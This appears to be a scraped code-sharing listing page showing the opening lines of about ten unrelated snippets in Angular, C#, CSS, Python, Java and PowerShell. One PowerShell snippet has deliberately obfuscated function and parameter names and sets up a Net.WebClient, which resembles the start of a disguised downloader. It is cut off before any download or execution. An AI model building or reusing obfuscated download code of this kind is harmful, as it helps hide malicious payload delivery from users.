This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import { Injectable } from '@angular/core'; | |
| import { AuthConfig, JwksValidationHandler, OAuthService, LoginOptions } from 'angular-oauth2-oidc'; | |
| import { JwtHelperService } from '@auth0/angular-jwt'; | |
| import { filter } from 'rxjs/operators'; | |
| import { HttpHeaders } from '@angular/common/http'; | |
| @Injectable({ | |
| providedIn: 'root' | |
| }) | |
| export class InitialAuthService { |
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function wsqbz() { | |
| Param( | |
| [Parameter(Mandatory=$True, Position=0)] | |
| [string] $iqnowurpmz, | |
| [Parameter(Mandatory=$True, Position=1)] | |
| [string] $cosbnypz | |
| ) | |
| $hjvsk = New-Object Net.WebClient |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import os,sys | |
| parentdir = os.path.dirname(__file__) | |
| sys.path.insert(0,parentdir) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using Microsoft.EntityFrameworkCore; | |
| namespace EFCoreExample | |
| { | |
| internal class Program | |
| { | |
| // Install Microsoft.EntityFrameworkCore and Microsoft.EntityFrameworkCore.SqlServer nuget packages. | |
| private static void Main(string[] args) | |
| { |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| .item { | |
| display: grid; | |
| place-items: center; | |
| } |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| https://imgur.com/a/UWFdKaM |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import xmlschema | |
| import json | |
| import yaml | |
| import glob | |
| ns = '{http://www.w3.org/XML/1998/namespace}' | |
| xs = '{http://www.w3.org/2001/XMLSchema}' | |
| def get_docs(element, lang): |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import yaml | |
| # Chcielibyśmy mieć następujący mechanizm: | |
| # 1. Gracz wkracza do lokacji i wyświetlają mu się konkretne możliwości. | |
| # 2. Zależnie od wybranej możliwości, gracz przechodzi do kolejnej, konkretnej lokacji. | |
| # 3. Powrót do punktu 1 z inną lokacją. | |
| # 4. Jest możliwość wczytywania historii z osobnego pliku. | |
| data = ''' |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Diagnostics; | |
| using System.IO; | |
| using System.Runtime.InteropServices; | |
| using System.Windows; | |
| using System.Windows.Interop; | |
| namespace TestWpfAppControl | |
| { | |
| /// <summary> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import java.io.BufferedReader; | |
| import java.io.BufferedWriter; | |
| import java.io.InputStream; | |
| import java.io.InputStreamReader; | |
| import java.io.OutputStream; | |
| import java.io.OutputStreamWriter; | |
| import java.net.ServerSocket; | |
| import java.net.Socket; | |
| public class SimpleHttpServer { |